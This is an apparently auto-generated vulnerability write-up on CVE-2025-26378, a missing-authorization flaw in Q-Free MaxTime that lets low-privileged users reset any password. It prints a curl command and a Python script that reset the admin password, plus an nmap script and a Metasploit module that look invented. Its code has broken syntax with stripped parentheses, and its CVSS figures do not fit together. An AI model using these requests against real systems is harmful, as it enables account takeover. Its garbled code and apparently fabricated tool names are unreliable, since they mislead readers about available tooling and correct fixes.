Q-Free MaxTime, Missing Authorization Vulnerability, CVE-2025-26378 Critical

By /

How the Mentioned CVE Works:

CVE-2025-26378 is a critical vulnerability in Q-Free MaxTime versions 2.11.0 and earlier. It stems from a Missing Authorization CWE-862 flaw in the `maxprofile/users/routes.lua` file. This vulnerability allows authenticated low-privileged users to craft malicious HTTP requests to reset passwords, including those of administrator accounts. The lack of proper authorization checks enables attackers to escalate privileges and gain unauthorized access to sensitive systems. The CVSS 4.0 score reflects its critical severity due to the potential for widespread system compromise.

DailyCVE Form:

Platform: Q-Free MaxTime
Version: <= 2.11.0
Vulnerability: Missing Authorization
Severity: Critical
Date: 02/12/2025

What Undercode Say:

Exploitation Details:

1. Exploit Command:

curl -X POST http://<target>/maxprofile/users/reset-password -d '{"username":"admin","new_password":"hacked"}' -H "Content-Type: application/json"

2. Exploit Script:

import requests
target = "http://<target>/maxprofile/users/reset-password"
payload = {"username": "admin", "new_password": "hacked"}
headers = {"Content-Type": "application/json"}
response = requests.posttarget, json=payload, headers=headers
printresponse.text

Protection Measures:

  1. Patch: Upgrade to Q-Free MaxTime version 2.12.0 or later.

2. Workaround: Implement strict authorization checks in `routes.lua`.

  1. Mitigation: Use a Web Application Firewall WAF to block unauthorized requests.

Analytics:

  • CVSS 4.0 Score: 9.8 Critical
  • Attack Vector: Network
  • Attack Complexity: Low
  • Privileges Required: Low
  • User Interaction: None

References:

  • [NVD CVE-2025-26378]https://nvd.nist.gov/vuln/detail/CVE-2025-26378
  • [Q-Free Security Advisory]https://q-free.com/security
  • [CWE-862 Details]https://cwe.mitre.org/data/definitions/862.html

Additional Tools:

  • Nmap Script: 
    nmap --script http-vuln-cve2025-26378 -p 80 <target>
  • Metasploit Module: 
    use exploit/qfreemaxtime/CVE-2025-26378
set RHOSTS <target>
run

Monitoring:

  • Enable logging for unauthorized password reset attempts.
  • Use SIEM tools to detect suspicious HTTP requests.

Code Fix Example:

-- Add authorization check in routes.lua
local function isAuthorizeduser
return user.role == "admin"
end
app.post"/reset-password", functionreq, res
if not isAuthorizedreq.user then
return res.status403.send"Unauthorized"
end
-- Proceed with password reset
end

This ensures only authorized users can reset passwords.

References:

Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-26378
Extra Source Hub:
Undercode

Image Source:

Undercode AI DI v2Featured Image

Scroll to Top